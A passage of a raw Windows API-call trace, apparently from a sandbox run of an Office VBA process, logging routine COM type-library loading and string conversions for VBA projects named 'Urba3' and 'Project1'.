pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.143] IUnknown:QueryInterface (in: This=0x7edf740, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206208 | out: ppvObject=0x206208*=0x0) returned 0x80004002 [0045.143] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x206200, pDummy=0x10 | out: ppTLibAttr=0x206200, pDummy=0x10) returned 0x0 [0045.143] ITypeLib:RemoteGetDocumentation (in: This=0x7edf740, index=-1, refPtrFlags=0x0, pbstrName=0x2061f8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xbf9f18e0f92d | out: pbstrName=0x2061f8*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xbf9f18e0f92d) returned 0x0 [0045.143] StringFromGUID2 (in: rguid=0x7e02c60*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x206220, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0045.143] _ultow_s (in: _Value=0x4, _Buffer=0x20616a, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0045.143] _ultow_s (in: _Value=0x2, _Buffer=0x20616e, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0045.143] _ultow_s (in: _Value=0x9, _Buffer=0x206172, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0045.143] wcscpy_s (in: _Destination=0x810c1e8, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0045.143] wcscpy_s (in: _Destination=0x810c1ee, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0045.143] wcscpy_s (in: _Destination=0x810c23a, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0045.143] wcscpy_s (in: _Destination=0x810c248, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0045.143] wcscpy_s (in: _Destination=0x810c2ce, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0045.143] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0045.143] IMalloc:Realloc (This=0x7feff045380, pv=0x2706b70, cb=0x340) returned 0x81f8050 [0045.143] wcscpy_s (in: _Destination=0x81f8198, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0045.143] ITypeLib:RemoteGetDocumentation (in: This=0x7edf740, index=-1, refPtrFlags=0x206318, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3) returned 0x0 [0045.143] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0045.143] strcpy_s (in: _Dst=0x206110, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0045.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x206110, cbMultiByte=4, lpWideCharStr=0x205f60, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0045.144] IUnknown:AddRef (This=0x3dd7b80) returned 0x5 [0045.144] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="VBA", lHashVal=0x10e2f7, pfName=0x206030, pBstrLibName=0x205f60 | out: pfName=0x206030*=0, pBstrLibName=0x205f60) returned 0x0 [0045.144] IUnknown:Release (This=0x3dd7b80) returned 0x4 [0045.144] IMalloc:Alloc (This=0x7feff045380, cb=0xc) returned 0x7d0c9a0 [0045.144] IMalloc:Free (This=0x7feff045380, pv=0x7dfef70) [0045.144] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfef70 [0045.144] IMalloc:Free (This=0x7feff045380, pv=0x7d0c9a0) [0045.144] wcsncpy_s (in: _Destination=0x205f10, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0045.144] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0045.144] IMalloc:Alloc (This=0x7feff045380, cb=0x122) returned 0x8086b30 [0045.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x8086b30, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0045.144] IMalloc:Free (This=0x7feff045380, pv=0x8086b30) [0045.144] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0045.144] wcsncpy_s (in: _Destination=0x205f10, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.144] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x205e40, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.144] _wcsicmp (_String1="*\\Z035e399ea6", _String2="*\\Z035e399ea6") returned 0 [0045.144] IUnknown:AddRef (This=0x7edf740) returned 0x4 [0045.144] IUnknown:QueryInterface (in: This=0x7edf740, riid=0x7fee40385a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206338 | out: ppvObject=0x206338*=0x0) returned 0x80004002 [0045.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x206300, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0045.144] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0045.144] IUnknown:Release (This=0x7edf740) returned 0x3 [0045.144] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188280 [0045.144] IMalloc:GetSize (This=0x7feff045380, pv=0x8188280) returned 0x0 [0045.144] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188270 [0045.145] IMalloc:GetSize (This=0x7feff045380, pv=0x8188270) returned 0x0 [0045.145] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188290 [0045.145] qsort (in: _Base=0x8188290, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee3de5594 | out: _Base=0x8188290) [0045.145] IMalloc:Free (This=0x7feff045380, pv=0x8188290) [0045.145] IMalloc:Alloc (This=0x7feff045380, cb=0x18) returned 0x7d0c9a0 [0045.145] IMalloc:Alloc (This=0x7feff045380, cb=0xc) returned 0x817bab0 [0045.145] IMalloc:GetSize (This=0x7feff045380, pv=0x817bab0) returned 0xc [0045.145] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win16") returned 0x107ec1 [0045.145] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win32") returned 0x107f07 [0045.145] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win64") returned 0x107f78 [0045.145] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mac") returned 0x10b2b3 [0045.145] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA6") returned 0x1023ad [0045.145] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA7") returned 0x1023ae [0045.145] IMalloc:Free (This=0x7feff045380, pv=0x8188270) [0045.145] IMalloc:Free (This=0x7feff045380, pv=0x8188280) [0045.145] CoCreateGuid (in: pguid=0x2069e8 | out: pguid=0x2069e8*(Data1=0xdc6e5ff5, Data2=0x8c7d, Data3=0x4230, Data4=([0]=0xb7, [1]=0x2c, [2]=0x8a, [3]=0xf8, [4]=0x96, [5]=0xb0, [6]=0x3c, [7]=0x66))) returned 0x0 [0045.145] wcsncmp (_String1="*\\Z", _String2="*\\Z", _MaxCount=0x3) returned 0 [0045.145] IMalloc:Alloc (This=0x7feff045380, cb=0x6b0) returned 0x81f83a0 [0045.145] CoCreateGuid (in: pguid=0x7fd6788 | out: pguid=0x7fd6788*(Data1=0x53c319ff, Data2=0x70bf, Data3=0x4c99, Data4=([0]=0x9c, [1]=0xb8, [2]=0x8d, [3]=0x74, [4]=0xa, [5]=0xc4, [6]=0xa, [7]=0x87))) returned 0x0 [0045.145] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x0) returned 0x8188280 [0045.145] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6c410 [0045.145] strcpy_s (in: _Dst=0x7fd67e8, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0045.145] LoadStringA (in: hInstance=0x7fef89d0000, uID=0x32f3, lpBuffer=0x25aa468, cchBufferMax=128 | out: lpBuffer="Project") returned 0x7 [0045.146] wsprintfA (in: param_1=0x25aa46f, param_2="%d" | out: param_1="1") returned 1 [0045.146] SysStringByteLen (bstr="牕慢3") returned 0x5 [0045.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02308, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0045.146] SysStringByteLen (bstr="牕慢3") returned 0x5 [0045.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02308, cbMultiByte=6, lpWideCharStr=0x7e02c68, cchWideChar=6 | out: lpWideCharStr="Urba3") returned 6 [0045.147] lstrlenA (lpString="Urba3") returned 5 [0045.147] lstrcmpiA (lpString1="Urba3", lpString2="Project1") returned 1 [0045.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x25aa468, cbMultiByte=-1, lpWideCharStr=0x2076c0, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0045.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x2075b0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0045.147] lstrcmpiA (lpString1="", lpString2="Project1") returned -1 [0045.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0045.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x2074b0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0045.147] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0045.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x2073c0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0045.147] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0045.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x2073c0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0045.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x207280, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0045.147] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0045.147] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0045.147] IMalloc:Alloc (This=0x7feff045380, cb=0x18) returned 0x8177790 [0045.147] IMalloc:Free (This=0x7feff045380, pv=0x7dfef70) [0045.147] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfef70 [0045.147] IMalloc:Realloc (This=0x7feff045380, pv=0x7dfef70, cb=0x44) returned 0x7fc1fa0 [0045.147] IMalloc:Free (This=0x7feff045380, pv=0x8177790) [0045.147] wcsncpy_s (in: _Destination=0x207080, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.147] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x206fb0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.147] _wcsicmp (_String1="*\\Z035e399ea6", _String2="*\\Z035e399ea6") returned 0 [0045.147] strcpy_s (in: _Dst=0x7fd67f8, _DstSize=0x9, _Src="Project1" | out: _Dst="Project1") returned 0x0 [0045.148] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0045.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02308, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0045.148] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0045.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02308, cbMultiByte=9, lpWideCharStr=0x7e02c68, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0045.148] lstrlenA (lpString="Project1") returned 8 [0045.148] QueryPathOfRegTypeLib (in: guid=0x7fee4049508*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x2, wMin=0x0, lcid=0x0, lpbstrPathName=0x207228 | out: lpbstrPathName=0x207228) returned 0x0 [0045.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb", cchWideChar=-1, lpMultiByteStr=0x2071e0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlb", lpUsedDefaultChar=0x0) returned 32 [0045.150] lstrlenA (lpString="C:\\Windows\\system32\\stdole2.tlb") returned 31 [0045.150] lstrcpyA (in: lpString1=0x25a7f70, lpString2="C:\\Windows\\system32\\stdole2.tlb" | out: lpString1="C:\\Windows\\system32\\stdole2.tlb") returned="C:\\Windows\\system32\\stdole2.tlb" [0045.150] _access_s (_FileName="C:\\Windows\\system32\\stdole2.tlb", _AccessMode=0) returned 0x0 [0045.150] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x207598*=0x0 | out: pptlib=0x207598*=0x7ee0550) returned 0x0 [0045.150] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x207228*=0x0 | out: pptlib=0x207228*=0x7ee0550) returned 0x0 [0045.150] ITypeLib:RemoteGetDocumentation (in: This=0x7ee0550, index=-1, refPtrFlags=0x207248, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x207130, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0045.150] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0045.150] IUnknown:QueryInterface (in: This=0x7ee0550, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207108 | out: ppvObject=0x207108*=0x0) returned 0x80004002 [0045.150] GetLocalTime (in: lpSystemTime=0x206fb0 | out: lpSystemTime=0x206fb0*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x39c)) [0045.151] wcsncpy_s (in: _Destination=0x206c60, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.151] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x206b90, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.151] _wcsicmp (_String1="*\\Z035e399ea6", _String2="*\\Z035e399ea6") returned 0 [0045.151] IUnknown:QueryInterface (in: This=0x7ee0550, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207038 | out: ppvObject=0x207038*=0x0) returned 0x80004002 [0045.151] ITypeLib:RemoteGetLibAttr (in: This=0x7ee0550, ppTLibAttr=0x207030, pDummy=0x10 | out: ppTLibAttr=0x207030, pDummy=0x10) returned 0x0 [0045.151] ITypeLib:RemoteGetDocumentation (in: This=0x7ee0550, index=-1, refPtrFlags=0x0, pbstrName=0x207028, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x207028*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.151] StringFromGUID2 (in: rguid=0x7e02c60*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x207050, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0045.151] _ultow_s (in: _Value=0x2, _Buffer=0x206f9a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0045.151] _ultow_s (in: _Value=0x0, _Buffer=0x206f9e, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0045.151] _ultow_s (in: _Value=0x0, _Buffer=0x206fa2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0045.151] wcscpy_s (in: _Destination=0x8114dc8, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0045.151] wcscpy_s (in: _Destination=0x8114dce, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: _Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0045.151] wcscpy_s (in: _Destination=0x8114e1a, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0045.151] wcscpy_s (in: _Destination=0x8114e28, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0045.151] wcscpy_s (in: _Destination=0x8114e68, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0045.151] ITypeLib:LocalReleaseTLibAttr (This=0x7ee0550) returned 0x0 [0045.151] IMalloc:Realloc (This=0x7feff045380, pv=0x81f8050, cb=0x680) returned 0x81f4bb0 [0045.151] wcscpy_s (in: _Destination=0x81f4e48, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0045.151] ITypeLib:RemoteGetDocumentation (in: This=0x7ee0550, index=-1, refPtrFlags=0x207148, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0045.151] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0045.151] strcpy_s (in: _Dst=0x206f40, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0045.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x206f40, cbMultiByte=7, lpWideCharStr=0x206d90, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0045.151] IUnknown:AddRef (This=0x7edf740) returned 0x4 [0045.151] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="stdole", lHashVal=0x106093, pfName=0x206e60, pBstrLibName=0x206d90 | out: pfName=0x206e60*=0, pBstrLibName=0x206d90) returned 0x0 [0045.151] IUnknown:Release (This=0x7edf740) returned 0x3 [0045.151] IUnknown:AddRef (This=0x3dd7b80) returned 0x5 [0045.151] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="stdole", lHashVal=0x106093, pfName=0x206e60, pBstrLibName=0x206d90 | out: pfName=0x206e60*=0, pBstrLibName=0x206d90) returned 0x0 [0045.151] IUnknown:Release (This=0x3dd7b80) returned 0x4 [0045.151] IMalloc:Alloc (This=0x7feff045380, cb=0x24) returned 0x7dfed90 [0045.151] IMalloc:Free (This=0x7feff045380, pv=0x7fc1fa0) [0045.151] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfefa0 [0045.151] IMalloc:Realloc (This=0x7feff045380, pv=0x7dfefa0, cb=0x50) returned 0x7f180d0 [0045.151] IMalloc:Free (This=0x7feff045380, pv=0x7dfed90) [0045.151] wcsncpy_s (in: _Destination=0x206d40, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0045.152] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0045.152] IMalloc:Alloc (This=0x7feff045380, cb=0xbe) returned 0x8134740 [0045.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x8134740, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0045.152] IMalloc:Free (This=0x7feff045380, pv=0x8134740) [0045.152] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0 [0045.152] wcsncpy_s (in: _Destination=0x206d40, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.152] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x206c70, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.152] _wcsicmp (_String1="*\\Z035e399ea6", _String2="*\\Z035e399ea6") returned 0 [0045.152] IUnknown:AddRef (This=0x7ee0550) returned 0x6 [0045.152] IUnknown:QueryInterface (in: This=0x7ee0550, riid=0x7fee40385a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207168 | out: ppvObject=0x207168*=0x0) returned 0x80004002 [0045.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x207130, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0045.152] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0045.152] IUnknown:Release (This=0x7ee0550) returned 0x5 [0045.152] IUnknown:Release (This=0x7ee0550) returned 0x4 [0045.152] GetModuleFileNameA (in: hModule=0x7fee3c90000, lpFilename=0x2074d0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0045.152] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", _SizeInBytes=0x104, _Source="\\3" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3") returned 0x0 [0045.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2074d0, cbMultiByte=-1, lpWideCharStr=0x207430, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft 